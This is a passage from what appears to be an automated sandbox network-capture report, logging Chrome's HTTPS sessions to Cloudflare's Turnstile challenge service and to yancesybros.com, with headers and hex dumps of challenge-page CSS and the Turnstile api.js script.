                                                    Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                    Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                    Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                    Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                    Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                    Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                    Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.449753104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:55 UTC413OUTGET /turnstile/v0/g/e4025c85ea63/api.js?onload=iQmfw1&render=explicit HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:55 UTC471INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:55 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 47695
                                                    Connection: close
                                                    accept-ranges: bytes
                                                    last-modified: Tue, 19 Nov 2024 14:16:20 GMT
                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                    access-control-allow-origin: *
                                                    cross-origin-resource-policy: cross-origin
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c98058e6c341-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:55 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                    Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                    Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                    Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                    Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                    Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                    Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                                    Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                    Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                    Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                    Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.449754172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:55 UTC588OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:56 UTC893INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:43:56 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 7
                                                    Connection: close
                                                    cf-chl-out: aNQNA3bjAJeZvVB8w5FYXGZVP3TnQIgbI9A=$SdpV/zW4rCfylIWt
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8t%2FpnWgJycK9h5psXdY9xDlhVdxosPE7Wj6U%2BIcEZt8It7tU8bXqPJw6UvIh%2FV6TJaIa9Vj9nhGDZR9LZZg1DwPWctr832xRYwSik2LlaJ43TDPvhmfRSIUtnS94bV6P8zw%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9845bc6c326-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1520&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1166&delivery_rate=1907250&cwnd=252&unsent_bytes=0&cid=7e4ef2df29ca64d0&ts=477&x=0"
                                                    2024-11-25 18:43:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                    Data Ascii: invalid


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.449755104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:56 UTC731OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e83c97ff9621a48&lang=auto HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
